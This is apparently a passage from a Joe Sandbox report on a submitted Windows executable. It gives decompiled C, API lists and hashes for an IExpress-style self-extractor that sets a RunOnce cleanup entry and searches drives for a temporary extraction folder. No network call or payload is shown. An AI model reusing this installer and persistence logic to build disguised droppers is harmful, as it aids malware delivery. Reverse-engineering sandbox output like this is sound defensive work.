                                                                                                                                                                                                                                    0x00402c6d
                                                                                                                                                                                                                                    0x00402c74
                                                                                                                                                                                                                                    0x00402c76
                                                                                                                                                                                                                                    0x00402c7c
                                                                                                                                                                                                                                    0x00402c7e
                                                                                                                                                                                                                                    0x00402c87
                                                                                                                                                                                                                                    0x00402c89
                                                                                                                                                                                                                                    0x00402c89
                                                                                                                                                                                                                                    0x00402c87
                                                                                                                                                                                                                                    0x00402c7c
                                                                                                                                                                                                                                    0x00402c74
                                                                                                                                                                                                                                    0x00402c8e
                                                                                                                                                                                                                                    0x00402c95
                                                                                                                                                                                                                                    0x00402c98
                                                                                                                                                                                                                                    0x00402c98
                                                                                                                                                                                                                                    0x00402c9e
                                                                                                                                                                                                                                    0x00402ca7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C03
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C18
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00402C28
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00406BB0,00400000,00000000,00000002,0000000A), ref: 00402C98
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                    • Opcode ID: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
                                                                                                                                                                                                                                    • Instruction ID: 373ad44501aeb887ed01a9fdf89c2162dac343eefee69ca1e043016b058be2d5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bf725c2443ac3e33919fba430f8a36c7d83ff64ff9bd08612ecfe4855b0a2a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00118C312043166BF7207BA5AF8CA6B37599B88394B04403AB940B72E1DAB8DC418A6D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 069027C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 069027EE
                                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0690280E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.447521600.0000000006902000.00000040.00000020.00020000.00000000.sdmp, Offset: 06902000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6902000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3833638111-0
                                                                                                                                                                                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                    • Instruction ID: 3381d964e7d3ffb4455239804fc24c6070b45156e20e1d25248d06a357bc3e14
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F0F636600311AFE7603BF4AC8CB6E76ECBF88625F200128EA42918C0DB70E9458661
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E0040202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x408004; // 0x8f135e3b
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00406CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0040171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0040658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x409a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x4091e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x4091e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x4091e5);
						if(_t90 != 0) {
							 *0x408580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E0040171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E004044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0040658A( &_v268, 0x104, 0x401140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x408530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                    0x0040202a
                                                                                                                                                                                                                                    0x00402035
                                                                                                                                                                                                                                    0x0040203c
                                                                                                                                                                                                                                    0x00402041
                                                                                                                                                                                                                                    0x00402050
                                                                                                                                                                                                                                    0x0040205f
                                                                                                                                                                                                                                    0x00402064
                                                                                                                                                                                                                                    0x0040206f
                                                                                                                                                                                                                                    0x0040208c
                                                                                                                                                                                                                                    0x00402094
                                                                                                                                                                                                                                    0x00402257
                                                                                                                                                                                                                                    0x00402266
                                                                                                                                                                                                                                    0x00402266
                                                                                                                                                                                                                                    0x0040209a
                                                                                                                                                                                                                                    0x0040209b
                                                                                                                                                                                                                                    0x0040209d
                                                                                                                                                                                                                                    0x004020aa
                                                                                                                                                                                                                                    0x004020af
                                                                                                                                                                                                                                    0x004020c9
                                                                                                                                                                                                                                    0x004020d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004020d3
                                                                                                                                                                                                                                    0x004020da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004020da
                                                                                                                                                                                                                                    0x004020e2
                                                                                                                                                                                                                                    0x00402103
                                                                                                                                                                                                                                    0x0040210e
                                                                                                                                                                                                                                    0x00402116
                                                                                                                                                                                                                                    0x00402122
                                                                                                                                                                                                                                    0x00402128
                                                                                                                                                                                                                                    0x0040212c
                                                                                                                                                                                                                                    0x00402179
                                                                                                                                                                                                                                    0x00402194
                                                                                                                                                                                                                                    0x004021de
                                                                                                                                                                                                                                    0x004021e4
                                                                                                                                                                                                                                    0x00402256
                                                                                                                                                                                                                                    0x00402256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402256
                                                                                                                                                                                                                                    0x00402196
                                                                                                                                                                                                                                    0x00402196
                                                                                                                                                                                                                                    0x0040219c
                                                                                                                                                                                                                                    0x0040219f
                                                                                                                                                                                                                                    0x0040219f
                                                                                                                                                                                                                                    0x004021a1
                                                                                                                                                                                                                                    0x004021a2
                                                                                                                                                                                                                                    0x004021a6
                                                                                                                                                                                                                                    0x004021a8
                                                                                                                                                                                                                                    0x004021b0
                                                                                                                                                                                                                                    0x004021b0
                                                                                                                                                                                                                                    0x004021b2
                                                                                                                                                                                                                                    0x004021b3
                                                                                                                                                                                                                                    0x004021bc
                                                                                                                                                                                                                                    0x004021c7
                                                                                                                                                                                                                                    0x004021cb
                                                                                                                                                                                                                                    0x004021f1
                                                                                                                                                                                                                                    0x004021f6
                                                                                                                                                                                                                                    0x004021fd
                                                                                                                                                                                                                                    0x004021ff
                                                                                                                                                                                                                                    0x004021ff
                                                                                                                                                                                                                                    0x00402204
                                                                                                                                                                                                                                    0x00402213
                                                                                                                                                                                                                                    0x00402218
                                                                                                                                                                                                                                    0x0040221d
                                                                                                                                                                                                                                    0x0040221d
                                                                                                                                                                                                                                    0x00402220
                                                                                                                                                                                                                                    0x00402220
                                                                                                                                                                                                                                    0x00402222
                                                                                                                                                                                                                                    0x00402223
                                                                                                                                                                                                                                    0x00402229
                                                                                                                                                                                                                                    0x0040223d
                                                                                                                                                                                                                                    0x00402249
                                                                                                                                                                                                                                    0x00402250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402250
                                                                                                                                                                                                                                    0x004021d2
                                                                                                                                                                                                                                    0x004021d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004021d9
                                                                                                                                                                                                                                    0x0040213a
                                                                                                                                                                                                                                    0x00402141
                                                                                                                                                                                                                                    0x00402144
                                                                                                                                                                                                                                    0x0040214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                                                    0x00402172
                                                                                                                                                                                                                                    0x00402172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402163
                                                                                                                                                                                                                                    0x004020ea
                                                                                                                                                                                                                                    0x004020f0
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402050
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040205F
                                                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040208C
                                                                                                                                                                                                                                      • Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020C9
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020EA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402103
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402122
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00402134
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402144
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040215B
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0040218C
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021C1
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021E4
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0040223D
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402249
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402250
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                    • API String ID: 178549006-3765599613
                                                                                                                                                                                                                                    • Opcode ID: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
                                                                                                                                                                                                                                    • Instruction ID: abd05bcecfda372187b57d735bcaea41b16cf637c922aa78c443ab609978b97c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bf0e1e7ac6b8ceac50cf57e4c09883d7fb06c483310c7f4308435288bc66475
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1510671A00218ABDB209F60DE4DFEB777CEB44700F0041BAFA49F71D1DAB89D498A58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004055A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 232 4055a0-4055d9 call 40468f LocalAlloc 235 4055db-4055f1 call 4044b9 call 406285 232->235 236 4055fd-40560c call 40468f 232->236 251 4055f6-4055f8 235->251 242 405632-405643 lstrcmpA 236->242 243 40560e-405630 call 4044b9 LocalFree 236->243 245 405645 242->245 246 40564b-405659 LocalFree 242->246 243->251 245->246 249 405696-40569c 246->249 250 40565b-40565d 246->250 255 4056a2-4056a8 249->255 256 40589f-4058b5 call 406517 249->256 252 405669 250->252 253 40565f-405667 250->253 254 4058b7-4058c7 call 406ce0 251->254 258 40566b-40567a call 405467 252->258 253->252 253->258 255->256 257 4056ae-4056c1 GetTempPathA 255->257 256->254 261 4056f3-405711 call 401781 257->261 262 4056c3-4056c9 call 405467 257->262 270 405680-405691 call 4044b9 258->270 271 40589b-40589d 258->271 275 405717-405729 GetDriveTypeA 261->275 276 40586c-405890 GetWindowsDirectoryA call 40597d 261->276 269 4056ce-4056d0 262->269 269->271 273 4056d6-4056df call 402630 269->273 270->251 271->254 273->261 288 4056e1-4056ed call 405467 273->288 280 405730-405740 GetFileAttributesA 275->280 281 40572b-40572e 275->281 276->261 289 405896 276->289 282 405742-405745 280->282 283 40577e-40578f call 40597d 280->283 281->280 281->282 286 405747-40574f 282->286 287 40576b 282->287 298 405791-40579e call 402630 283->298 299 4057b2-4057bf call 402630 283->299 291 405771-405779 286->291 292 405751-405753 286->292 287->291 288->261 288->271 289->271 296 405864-405866 291->296 292->291 295 405755-405762 call 406952 292->295 295->287 308 405764-405769 295->308 296->275 296->276 298->287 309 4057a0-4057b0 call 40597d 298->309 306 4057c1-4057cd GetWindowsDirectoryA 299->306 307 4057d3-4057f8 call 40658a GetFileAttributesA 299->307 306->307 314 40580a 307->314 315 4057fa-405808 CreateDirectoryA 307->315 308->283 308->287 309->287 309->299 316 40580d-40580f 314->316 315->316 317 405811-405825 316->317 318 405827-40585c SetFileAttributesA call 401781 call 405467 316->318 317->296 318->271 323 40585e 318->323 323->296
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E004055A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x408004; // 0x8f135e3b
				_v8 = _t28 ^ _t110;
				_t2 = E0040468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0040468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x409a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x408b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x408a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00406517(_t82, 0x7d2, 0, E00403210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x409a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x4091e4;
									_t40 = GetTempPathA(0x104, 0x4091e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00401781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00406952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0040597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00402630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0040658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x4091e4;
																					E00401781(0x4091e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00405467(0x4091e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00402630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0040597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00405467(0x4091e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x4091e4;
											_t70 = E00402630(0, 0x4091e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x4091e4;
												_t71 = E00405467(0x4091e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0040597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x408b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00405467(0x408b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E004044B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x409124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x409124 = E00406285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00406CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                    0x004055ab
                                                                                                                                                                                                                                    0x004055b2
                                                                                                                                                                                                                                    0x004055c9
                                                                                                                                                                                                                                    0x004055d5
                                                                                                                                                                                                                                    0x004055d9
                                                                                                                                                                                                                                    0x00405600
                                                                                                                                                                                                                                    0x00405605
                                                                                                                                                                                                                                    0x0040560a
                                                                                                                                                                                                                                    0x0040560c
                                                                                                                                                                                                                                    0x00405638
                                                                                                                                                                                                                                    0x00405641
                                                                                                                                                                                                                                    0x00405643
                                                                                                                                                                                                                                    0x00405645
                                                                                                                                                                                                                                    0x00405645
                                                                                                                                                                                                                                    0x0040564c
                                                                                                                                                                                                                                    0x00405652
                                                                                                                                                                                                                                    0x00405657
                                                                                                                                                                                                                                    0x00405659
                                                                                                                                                                                                                                    0x00405696
                                                                                                                                                                                                                                    0x0040569c
                                                                                                                                                                                                                                    0x0040589f
                                                                                                                                                                                                                                    0x004058a7
                                                                                                                                                                                                                                    0x004058ac
                                                                                                                                                                                                                                    0x004058b3
                                                                                                                                                                                                                                    0x004058b5
                                                                                                                                                                                                                                    0x004056a2
                                                                                                                                                                                                                                    0x004056a2
                                                                                                                                                                                                                                    0x004056a8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004056ae
                                                                                                                                                                                                                                    0x004056ae
                                                                                                                                                                                                                                    0x004056b9
                                                                                                                                                                                                                                    0x004056bf
                                                                                                                                                                                                                                    0x004056c1
                                                                                                                                                                                                                                    0x004056f3
                                                                                                                                                                                                                                    0x004056f3
                                                                                                                                                                                                                                    0x00405705
                                                                                                                                                                                                                                    0x0040570a
                                                                                                                                                                                                                                    0x00405711
                                                                                                                                                                                                                                    0x00405717
                                                                                                                                                                                                                                    0x00405724
                                                                                                                                                                                                                                    0x00405726
                                                                                                                                                                                                                                    0x00405729
                                                                                                                                                                                                                                    0x00405730
                                                                                                                                                                                                                                    0x00405737
                                                                                                                                                                                                                                    0x0040573d
                                                                                                                                                                                                                                    0x00405740
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040572b
                                                                                                                                                                                                                                    0x0040572b
                                                                                                                                                                                                                                    0x0040572e
                                                                                                                                                                                                                                    0x00405742
                                                                                                                                                                                                                                    0x00405742
                                                                                                                                                                                                                                    0x00405745
                                                                                                                                                                                                                                    0x0040576b
                                                                                                                                                                                                                                    0x0040576b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405747
                                                                                                                                                                                                                                    0x00405747
                                                                                                                                                                                                                                    0x0040574d
                                                                                                                                                                                                                                    0x0040574f
                                                                                                                                                                                                                                    0x00405771
                                                                                                                                                                                                                                    0x00405771
                                                                                                                                                                                                                                    0x00405773
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405751
                                                                                                                                                                                                                                    0x00405751
                                                                                                                                                                                                                                    0x00405753
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405755
                                                                                                                                                                                                                                    0x0040575b
                                                                                                                                                                                                                                    0x00405760
                                                                                                                                                                                                                                    0x00405762
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00405764
                                                                                                                                                                                                                                    0x00405764
                                                                                                                                                                                                                                    0x00405769
                                                                                                                                                                                                                                    0x0040577e
                                                                                                                                                                                                                                    0x0040577e
                                                                                                                                                                                                                                    0x00405781
                                                                                                                                                                                                                                    0x00405788
                                                                                                                                                                                                                                    0x0040578d
                                                                                                                                                                                                                                    0x0040578f
                                                                                                                                                                                                                                    0x004057b2
                                                                                                                                                                                                                                    0x004057b8
                                                                                                                                                                                                                                    0x004057bd
                                                                                                                                                                                                                                    0x004057bf
                                                                                                                                                                                                                                    0x004057cd
                                                                                                                                                                                                                                    0x004057cd
                                                                                                                                                                                                                                    0x004057dd
                                                                                                                                                                                                                                    0x004057e3
                                                                                                                                                                                                                                    0x004057ef
                                                                                                                                                                                                                                    0x004057f5
                                                                                                                                                                                                                                    0x004057f8
                                                                                                                                                                                                                                    0x0040580a
                                                                                                                                                                                                                                    0x0040580a
                                                                                                                                                                                                                                    0x004057fa
                                                                                                                                                                                                                                    0x00405802
                                                                                                                                                                                                                                    0x00405802
                                                                                                                                                                                                                                    0x0040580d
                                                                                                                                                                                                                                    0x0040580f
                                                                                                                                                                                                                                    0x00405830
